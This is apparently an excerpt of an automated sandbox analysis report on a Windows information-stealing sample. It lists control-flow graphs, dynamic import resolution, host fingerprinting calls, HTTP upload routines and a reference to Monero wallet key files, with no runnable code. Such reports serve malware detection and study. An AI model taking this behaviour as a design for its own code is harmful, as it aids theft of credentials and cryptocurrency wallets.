14459 e44f27 codecvt 14462 e5a7a0 lstrcpy 14459->14462 14464 e5a9b0 4 API calls 14460->14464 14463 e5a8a0 lstrcpy 14461->14463 14475 e44f57 14462->14475 14463->14459 14465 e449a9 14464->14465 14466 e5a8a0 lstrcpy 14465->14466 14467 e449b2 14466->14467 14468 e5a9b0 4 API calls 14467->14468 14469 e449d1 14468->14469 14470 e5a8a0 lstrcpy 14469->14470 14471 e449da 14470->14471 14472 e5a920 3 API calls 14471->14472 14473 e449f8 14472->14473 14474 e5a8a0 lstrcpy 14473->14474 14476 e44a01 14474->14476 14475->13497 14477 e5a9b0 4 API calls 14476->14477 14478 e44a20 14477->14478 14479 e5a8a0 lstrcpy 14478->14479 14480 e44a29 14479->14480 14481 e5a9b0 4 API calls 14480->14481 14482 e44a48 14481->14482 14483 e5a8a0 lstrcpy 14482->14483 14484 e44a51 14483->14484 
[Control-flow graph residue: the original report rendered an execution graph here, and only its node/edge list (node IDs 14485 to 17687 with function addresses) survived extraction. The graph chains lstrcpy/lstrlen/lstrcat string building with WinINet calls (InternetOpenA, InternetCrackUrlA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile, InternetOpenUrlA, InternetCloseHandle), StrCmpCA comparisons leading to ExitProcess, and system, registry and process enumeration APIs (GetProcessHeap/RtlAllocateHeap/HeapFree, GetCurrentProcess/IsWow64Process, GetLocalTime, GetTimeZoneInformation, GetSystemTime, GetUserDefaultLocaleName, CharToOemW, GetKeyboardLayoutList, GetLocaleInfoA, GetSystemPowerStatus, GetCurrentProcessId/OpenProcess/GetModuleFileNameExA, RegOpenKeyExA/RegQueryValueExA/RegEnumKeyExA/RegCloseKey, GetLogicalProcessorInformationEx, GetLastError, GetSystemInfo, GlobalMemoryStatusEx, CreateToolhelp32Snapshot/Process32First/Process32Next, CryptStringToBinaryA, CryptBinaryToStringA, wsprintfA, LocalAlloc/LocalFree, VirtualAlloc/VirtualFree, LoadLibraryA/GetProcAddress/FreeLibrary, CloseHandle).]

                                  Control-flow Graph
                                  [Graph residue: basic blocks e59860-e59bc2. Block e59860-e59874 calls e59750; block e5987a-e59a8e calls e59780 and resolves imports with GetProcAddress * 21; block e59a93-e59af2 calls LoadLibraryA * 5; the following blocks (e59af4, e59b16 * 2, e59b4f, e59b71, e59b92 * 2) each resolve further imports with GetProcAddress before reaching e59bc1-e59bc2.]
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01CB14F8), ref: 00E598A1
                                  • GetProcAddress.KERNEL32(75900000,01CB1648), ref: 00E598BA
                                  • GetProcAddress.KERNEL32(75900000,01CB15B8), ref: 00E598D2
                                  • GetProcAddress.KERNEL32(75900000,01CB1528), ref: 00E598EA
                                  • GetProcAddress.KERNEL32(75900000,01CB1690), ref: 00E59903
                                  • GetProcAddress.KERNEL32(75900000,01CB9AD0), ref: 00E5991B
                                  • GetProcAddress.KERNEL32(75900000,01CA66E0), ref: 00E59933
                                  • GetProcAddress.KERNEL32(75900000,01CA6860), ref: 00E5994C
                                  • GetProcAddress.KERNEL32(75900000,01CB1678), ref: 00E59964
                                  • GetProcAddress.KERNEL32(75900000,01CB16A8), ref: 00E5997C
                                  • GetProcAddress.KERNEL32(75900000,01CB1738), ref: 00E59995
                                  • GetProcAddress.KERNEL32(75900000,01CB16C0), ref: 00E599AD
                                  • GetProcAddress.KERNEL32(75900000,01CA6880), ref: 00E599C5
                                  • GetProcAddress.KERNEL32(75900000,01CB16D8), ref: 00E599DE
                                  • GetProcAddress.KERNEL32(75900000,01CB1588), ref: 00E599F6
                                  • GetProcAddress.KERNEL32(75900000,01CA6700), ref: 00E59A0E
                                  • GetProcAddress.KERNEL32(75900000,01CB1798), ref: 00E59A27
                                  • GetProcAddress.KERNEL32(75900000,01CB1858), ref: 00E59A3F
                                  • GetProcAddress.KERNEL32(75900000,01CA66C0), ref: 00E59A57
                                  • GetProcAddress.KERNEL32(75900000,01CB1870), ref: 00E59A70
                                  • GetProcAddress.KERNEL32(75900000,01CA69A0), ref: 00E59A88
                                  • LoadLibraryA.KERNEL32(01CB17E0,?,00E56A00), ref: 00E59A9A
                                  • LoadLibraryA.KERNEL32(01CB17C8,?,00E56A00), ref: 00E59AAB
                                  • LoadLibraryA.KERNEL32(01CB17F8,?,00E56A00), ref: 00E59ABD
                                  • LoadLibraryA.KERNEL32(01CB1810,?,00E56A00), ref: 00E59ACF
                                  • LoadLibraryA.KERNEL32(01CB1888,?,00E56A00), ref: 00E59AE0
                                  • GetProcAddress.KERNEL32(75070000,01CB1828), ref: 00E59B02
                                  • GetProcAddress.KERNEL32(75FD0000,01CB1840), ref: 00E59B23
                                  • GetProcAddress.KERNEL32(75FD0000,01CB9D48), ref: 00E59B3B
                                  • GetProcAddress.KERNEL32(75A50000,01CB9CE8), ref: 00E59B5D
                                  • GetProcAddress.KERNEL32(74E50000,01CA6960), ref: 00E59B7E
                                  • GetProcAddress.KERNEL32(76E80000,01CB9A90), ref: 00E59B9F
                                  • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00E59BB6
                                  Strings
                                  • NtQueryInformationProcess, xrefs: 00E59BAA
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: NtQueryInformationProcess
                                  • API String ID: 2238633743-2781105232
                                  • Opcode ID: 7f4a083cc688c389ba15c94fdba1c41704982b388515214bf4b6d5402e637e90
                                  • Instruction ID: 284539fc4dcd1ff910f64f1238b50349aeaa06bbbf7eb8721a5bcb288bce498d
                                  • Opcode Fuzzy Hash: 7f4a083cc688c389ba15c94fdba1c41704982b388515214bf4b6d5402e637e90
                                  • Instruction Fuzzy Hash: 71A14BB5718200DFD364EFA8E988A5E37F9F78C711704451BA6C693A4CD63FA452EB20

                                  Control-flow Graph (rendered image not reproduced; legend: Executed / Not Executed)
                                  • Basic blocks: e445c0-e44695 (RtlAllocateHeap) -> e446a0-e446a6 -> e446ac-e4474a (loops back to e446a0) or e4474f-e447a9 (VirtualProtect)
                                  APIs
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E4460F
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00E4479C
                                  Strings
                                  • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00E445E8, 00E44622, 00E44678, 00E44734, 00E44729, 00E445D2, 00E4475A, 00E4473F, 00E4462D, 00E4466D, 00E44765, 00E4477B, 00E44657, 00E445C7, 00E446D8, 00E44643, 00E4471E, 00E445F3, 00E446CD, 00E446B7, 00E446AC, 00E44662, 00E44683, 00E44638, 00E4474F, 00E44617, 00E44713, 00E445DD, 00E446C2, 00E44770
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeapProtectVirtual
                                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated, '$'-separated, once per xref listed under Strings above)
                                  • API String ID: 1542196881-2218711628
                                  • Opcode ID: e5ca1647b0504cc14701e36f90aa6d234e4958a3cd496d758d274f07a3931e61
                                  • Instruction ID: 163abd6a8554feae7ba0a380251820624273db74ec8632675a9ca6ebdcc2e8b0
                                  • Opcode Fuzzy Hash: e5ca1647b0504cc14701e36f90aa6d234e4958a3cd496d758d274f07a3931e61
                                  • Instruction Fuzzy Hash: 1741F4637CA704EACE34BBA4B84EF9D7A965FCAB50F907254EE1062290DBB0751045B2

                                  Control-flow Graph (rendered image not reproduced; legend: Executed / Not Executed)
                                  • Basic blocks e44880-e44fa2: calls InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, lstrlen, HttpSendRequestA, InternetReadFile and InternetCloseHandle, plus internal subcalls e5a7a0, e447b0, e5a740, e58b60, e5a920, e5a8a0, e5a800, e5a9b0, e5aad0, e49ac0, e5a820 and e58990
                                  APIs
                                    • Part of subcall function 00E5A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00E5A7E6
                                    • Part of subcall function 00E447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E44839
                                    • Part of subcall function 00E447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E44849
                                    • Part of subcall function 00E5A740: lstrcpy.KERNEL32(00E60E17,00000000), ref: 00E5A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E44915
                                  • StrCmpCA.SHLWAPI(?,01CBF318), ref: 00E4493A
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E44ABA
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00E60DDB,00000000,?,?,00000000,?,",00000000,?,01CBF278), ref: 00E44DE8
                                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E44E04
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E44E18
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00E44E49
                                  • InternetCloseHandle.WININET(00000000), ref: 00E44EAD
                                  • InternetCloseHandle.WININET(00000000), ref: 00E44EC5
                                  • HttpOpenRequestA.WININET(00000000,01CBF398,?,01CBE7B0,00000000,00000000,00400100,00000000), ref: 00E44B15
                                    • Part of subcall function 00E5A9B0: lstrlen.KERNEL32(?,01CB97A0,?,\Monero\wallet.keys,00E60E17), ref: 00E5A9C5
                                    • Part of subcall function 00E5A9B0: lstrcpy.KERNEL32(00000000), ref: 00E5AA04
                                    • Part of subcall function 00E5A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E5AA12
                                    • Part of subcall function 00E5A8A0: lstrcpy.KERNEL32(?,00E60E17), ref: 00E5A905
                                    • Part of subcall function 00E5A920: lstrcpy.KERNEL32(00000000,?), ref: 00E5A972
                                    • Part of subcall function 00E5A920: lstrcat.KERNEL32(00000000), ref: 00E5A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00E44ECF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 460715078-2180234286
                                  • Opcode ID: d73541846a052961d4111e67b371b8b608fe708e33a166731f7fa3956d71c039
                                  • Instruction ID: 3b4a2eef7c6c931751dea405709e802f5114374eb63366baa8448ede254c3d94
                                  • Opcode Fuzzy Hash: d73541846a052961d4111e67b371b8b608fe708e33a166731f7fa3956d71c039
                                  • Instruction Fuzzy Hash: 09120B72910218AADB19EB90DC96FEEB3B8BF54301F5456A9B50672091EF302F4DCF61
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00E57910
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E57917
                                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00E5792F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateComputerNameProcess
                                  • String ID:
                                  • API String ID: 1664310425-0
                                  • Opcode ID: 898634258535f27605333821e63df29c6cb41a02b19dbae0f525cc80d20bdc8d
                                  • Instruction ID: a7c516a18fa88b24245f24e18f7aa440b4b379efb867506dd05056493353d163
                                  • Opcode Fuzzy Hash: 898634258535f27605333821e63df29c6cb41a02b19dbae0f525cc80d20bdc8d
                                  • Instruction Fuzzy Hash: 870186B1A48204EBC750DF94D945FAEFBB8F744B21F10461AFA85F3680C37959048BB1
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00E411B7), ref: 00E57880
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00E57887
                                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00E5789F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateNameProcessUser
                                  • String ID:
                                  • API String ID: 1296208442-0
                                  • Opcode ID: d5309c9b28e5b0de81a19a0b11a5ade630d21fab261825e98cc6d422e3846a35
                                  • Instruction ID: 9b9eb9cae73bfd555ac9e24c21340174466292f71cbdbae5ab2567af0211762f
                                  • Opcode Fuzzy Hash: d5309c9b28e5b0de81a19a0b11a5ade630d21fab261825e98cc6d422e3846a35
                                  • Instruction Fuzzy Hash: 60F04FB1E48208EBC714DF98DD49BAEBBB8FB04721F10065AFA45A3680C77915048BA1
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID: 7T{
                                  • API String ID: 2962429428-3012325311
                                  • Opcode ID: b2339aa747815183a94f7903a93ea14f202dfecdbba8577223abd13584acdf8c
                                  • Instruction ID: e06656712e1f1a57d11727a4dc8d9f6d46a71c73ebdc601fbc1b7c96e369d370
                                  • Opcode Fuzzy Hash: b2339aa747815183a94f7903a93ea14f202dfecdbba8577223abd13584acdf8c
                                  • Instruction Fuzzy Hash: F251D7F252D310AFD3096E59DC416BABBE9EF94730F15482EE6C5C3210E77149409B9B
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2207985094.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                   • Associated: 00000000.00000002.2207963445.0000000000E40000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EF1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000EFD000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.0000000000F22000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2207985094.000000000108A000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000109E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001230000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000130B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.000000000132E000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001335000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208200230.0000000001344000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208520311.0000000001345000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208654995.00000000014E3000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2208668490.00000000014E4000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_e40000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitInfoProcessSystem
                                  • String ID:
                                  • API String ID: 752954902-0
                                  • Opcode ID: b7b715866fc0817c43572c08caee4b70b4eac44ff25a9b7d5f7012da23b6dea0
                                  • Instruction ID: b96784bacb48a96aa432a6421d0e5a4f1f6a9f2b6bdf8dc957a896f8dd9381b6
                                  • Opcode Fuzzy Hash: b7b715866fc0817c43572c08caee4b70b4eac44ff25a9b7d5f7012da23b6dea0
                                  • Instruction Fuzzy Hash: 37D05E74E0430CDBCB10EFE0D8496DDBB78FB08311F001595D94673740EA355481CBA5

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                   [control-flow graph not reproduced: basic blocks e59c10 through e5a709, an import-resolution routine whose first block calls GetProcAddress * 43, followed by LoadLibraryA * 8 and further runs of GetProcAddress in the subsequent blocks]
                                  APIs
                                  • GetProcAddress.KERNEL32(75900000,01CA6680), ref: 00E59C2D
                                  • GetProcAddress.KERNEL32(75900000,01CA66A0), ref: 00E59C45
                                  • GetProcAddress.KERNEL32(75900000,01CB9F10), ref: 00E59C5E
                                  • GetProcAddress.KERNEL32(75900000,01CB9E68), ref: 00E59C76
                                  • GetProcAddress.KERNEL32(75900000,01CBD788), ref: 00E59C8E
                                  • GetProcAddress.KERNEL32(75900000,01CBD7E8), ref: 00E59CA7
                                  • GetProcAddress.KERNEL32(75900000,01CABF30), ref: 00E59CBF
                                  • GetProcAddress.KERNEL32(75900000,01CBD5F0), ref: 00E59CD7
                                  • GetProcAddress.KERNEL32(75900000,01CBD710), ref: 00E59CF0
                                  • GetProcAddress.KERNEL32(75900000,01CBD890), ref: 00E59D08
                                  • GetProcAddress.KERNEL32(75900000,01CBD848), ref: 00E59D20
                                  • GetProcAddress.KERNEL32(75900000,01CA67E0), ref: 00E59D39
                                  • GetProcAddress.KERNEL32(75900000,01CA6900), ref: 00E59D51
                                  • GetProcAddress.KERNEL32(75900000,01CA6760), ref: 00E59D69
                                  • GetProcAddress.KERNEL32(75900000,01CA6780), ref: 00E59D82
                                  • GetProcAddress.KERNEL32(75900000,01CBD728), ref: 00E59D9A
                                  • GetProcAddress.KERNEL32(75900000,01CBD6F8), ref: 00E59DB2
                                  • GetProcAddress.KERNEL32(75900000,01CABE68), ref: 00E59DCB
                                  • GetProcAddress.KERNEL32(75900000,01CA6800), ref: 00E59DE3
                                  • GetProcAddress.KERNEL32(75900000,01CBD740), ref: 00E59DFB
                                  • GetProcAddress.KERNEL32(75900000,01CBD608), ref: 00E59E14
                                  • GetProcAddress.KERNEL32(75900000,01CBD758), ref: 00E59E2C
                                  • GetProcAddress.KERNEL32(75900000,01CBD770), ref: 00E59E44
                                  • GetProcAddress.KERNEL32(75900000,01CA6820), ref: 00E59E5D
                                  • GetProcAddress.KERNEL32(75900000,01CBD650), ref: 00E59E75
                                  • GetProcAddress.KERNEL32(75900000,01CBD620), ref: 00E59E8D
                                  • GetProcAddress.KERNEL32(75900000,01CBD8A8), ref: 00E59EA6
                                  • GetProcAddress.KERNEL32(75900000,01CBD7D0), ref: 00E59EBE
                                  • GetProcAddress.KERNEL32(75900000,01CBD7A0), ref: 00E59ED6
                                  • GetProcAddress.KERNEL32(75900000,01CBD818), ref: 00E59EEF
                                  • GetProcAddress.KERNEL32(75900000,01CBD6C8), ref: 00E59F07
                                  • GetProcAddress.KERNEL32(75900000,01CBD638), ref: 00E59F1F
                                  • GetProcAddress.KERNEL32(75900000,01CBD6B0), ref: 00E59F38
                                  • GetProcAddress.KERNEL32(75900000,01CBADC0), ref: 00E59F50
                                  • GetProcAddress.KERNEL32(75900000,01CBD830), ref: 00E59F68
                                  • GetProcAddress.KERNEL32(75900000,01CBD668), ref: 00E59F81
                                  • GetProcAddress.KERNEL32(75900000,01CA68E0), ref: 00E59F99
                                  • GetProcAddress.KERNEL32(75900000,01CBD6E0), ref: 00E59FB1
                                  • GetProcAddress.KERNEL32(75900000,01CA6920), ref: 00E59FCA
                                  • GetProcAddress.KERNEL32(75900000,01CBD680), ref: 00E59FE2
                                  • GetProcAddress.KERNEL32(75900000,01CBD800), ref: 00E59FFA
                                  • GetProcAddress.KERNEL32(75900000,01CA6480), ref: 00E5A013
                                  • GetProcAddress.KERNEL32(75900000,01CA65A0), ref: 00E5A02B
                                  • LoadLibraryA.KERNEL32(01CBD8C0,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A03D
                                  • LoadLibraryA.KERNEL32(01CBD698,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A04E
                                  • LoadLibraryA.KERNEL32(01CBD860,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A060
                                  • LoadLibraryA.KERNEL32(01CBD878,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A072
                                  • LoadLibraryA.KERNEL32(01CBD7B8,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A083
                                  • LoadLibraryA.KERNEL32(01CBD8D8,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A095
                                  • LoadLibraryA.KERNEL32(01CBD9E0,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A0A7
                                  • LoadLibraryA.KERNEL32(01CBDA58,?,00E55CA3,00E60AEB,?,?,?,?,?,?,?,?,?,?,00E60AEA,00E60AE3), ref: 00E5A0B8
                                  • GetProcAddress.KERNEL32(75FD0000,01CA64C0), ref: 00E5A0DA
                                  • GetProcAddress.KERNEL32(75FD0000,01CBD968), ref: 00E5A0F2
                                  • GetProcAddress.KERNEL32(75FD0000,01CB9B10), ref: 00E5A10A
                                  • GetProcAddress.KERNEL32(75FD0000,01CBDB78), ref: 00E5A123
                                  • GetProcAddress.KERNEL32(75FD0000,01CA65E0), ref: 00E5A13B
                                  • GetProcAddress.KERNEL32(6FD30000,01CAC138), ref: 00E5A160
                                  • GetProcAddress.KERNEL32(6FD30000,01CA6440), ref: 00E5A179
                                  • GetProcAddress.KERNEL32(6FD30000,01CAC228), ref: 00E5A191
                                  • GetProcAddress.KERNEL32(6FD30000,01CBD938), ref: 00E5A1A9
                                  • GetProcAddress.KERNEL32(6FD30000,01CBDAE8), ref: 00E5A1C2
                                  • GetProcAddress.KERNEL32(6FD30000,01CA6600), ref: 00E5A1DA
                                  • GetProcAddress.KERNEL32(6FD30000,01CA6580), ref: 00E5A1F2
                                  • GetProcAddress.KERNEL32(6FD30000,01CBDB18), ref: 00E5A20B
                                  • GetProcAddress.KERNEL32(763B0000,01CA6320), ref: 00E5A22C
                                  • GetProcAddress.KERNEL32(763B0000,01CA63C0), ref: 00E5A244
                                  • GetProcAddress.KERNEL32(763B0000,01CBD9B0), ref: 00E5A25D
                                  • GetProcAddress.KERNEL32(763B0000,01CBD998), ref: 00E5A275
                                  • GetProcAddress.KERNEL32(763B0000,01CA6620), ref: 00E5A28D
                                  • GetProcAddress.KERNEL32(750F0000,01CABFA8), ref: 00E5A2B3
                                  • GetProcAddress.KERNEL32(750F0000,01CABDC8), ref: 00E5A2CB
                                  • GetProcAddress.KERNEL32(750F0000,01CBD9C8), ref: 00E5A2E3
                                  • GetProcAddress.KERNEL32(750F0000,01CA6540), ref: 00E5A2FC
                                  • GetProcAddress.KERNEL32(750F0000,01CA6640), ref: 00E5A314
                                  • GetProcAddress.KERNEL32(750F0000,01CABE90), ref: 00E5A32C
                                  • GetProcAddress.KERNEL32(75A50000,01CBDA70), ref: 00E5A352
                                  • GetProcAddress.KERNEL32(75A50000,01CA65C0), ref: 00E5A36A
                                  • GetProcAddress.KERNEL32(75A50000,01CB9A20), ref: 00E5A382
                                  • GetProcAddress.KERNEL32(75A50000,01CBDB90), ref: 00E5A39B
                                  • GetProcAddress.KERNEL32(75A50000,01CBDA88), ref: 00E5A3B3
                                  • GetProcAddress.KERNEL32(75A50000,01CA6380), ref: 00E5A3CB
                                  • GetProcAddress.KERNEL32(75A50000,01CA63A0), ref: 00E5A3E4
                                  • GetProcAddress.KERNEL32(75A50000,01CBDB60), ref: 00E5A3FC
                                  • GetProcAddress.KERNEL32(75A50000,01CBDAA0), ref: 00E5A414
                                  • GetProcAddress.KERNEL32(75070000,01CA62C0), ref: 00E5A436
                                  • GetProcAddress.KERNEL32(75070000,01CBDAD0), ref: 00E5A44E
                                  • GetProcAddress.KERNEL32(75070000,01CBDAB8), ref: 00E5A466
                                  • GetProcAddress.KERNEL32(75070000,01CBD950), ref: 00E5A47F
                                  • GetProcAddress.KERNEL32(75070000,01CBDBA8), ref: 00E5A497
                                  • GetProcAddress.KERNEL32(74E50000,01CA64E0), ref: 00E5A4B8
                                  • GetProcAddress.KERNEL32(74E50000,01CA6660), ref: 00E5A4D1
                                  • GetProcAddress.KERNEL32(75320000,01CA6280), ref: 00E5A4F2
                                  • GetProcAddress.KERNEL32(75320000,01CBD9F8), ref: 00E5A50A
                                  • GetProcAddress.KERNEL32(6F060000,01CA64A0), ref: 00E5A530
                                  • GetProcAddress.KERNEL32(6F060000,01CA6340), ref: 00E5A548
                                  • GetProcAddress.KERNEL32(6F060000,01CA63E0), ref: 00E5A560
                                  • GetProcAddress.KERNEL32(6F060000,01CBDBC0), ref: 00E5A579
                                  • GetProcAddress.KERNEL32(6F060000,01CA6400), ref: 00E5A591
                                  • GetProcAddress.KERNEL32(6F060000,01CA6420), ref: 00E5A5A9
                                  • GetProcAddress.KERNEL32(6F060000,01CA62A0), ref: 00E5A5C2
                                  • GetProcAddress.KERNEL32(6F060000,01CA62E0), ref: 00E5A5DA
                                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00E5A5F1
                                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00E5A607
                                  • GetProcAddress.KERNEL32(74E00000,01CBDB30), ref: 00E5A629
                                  • GetProcAddress.KERNEL32(74E00000,01CB9990), ref: 00E5A641
                                  • GetProcAddress.KERNEL32(74E00000,01CBDA10), ref: 00E5A659
                                  • GetProcAddress.KERNEL32(74E00000,01CBDA28), ref: 00E5A672
                                  • GetProcAddress.KERNEL32(74DF0000,01CA6300), ref: 00E5A693
                                  • GetProcAddress.KERNEL32(6F9A0000,01CBDB00), ref: 00E5A6B4
                                  • GetProcAddress.KERNEL32(6F9A0000,01CA6360), ref: 00E5A6CD
                                  • GetProcAddress.KERNEL32(6F9A0000,01CBDB48), ref: 00E5A6E5
                                  • GetProcAddress.KERNEL32(6F9A0000,01CBDBD8), ref: 00E5A6FD
                                  Strings
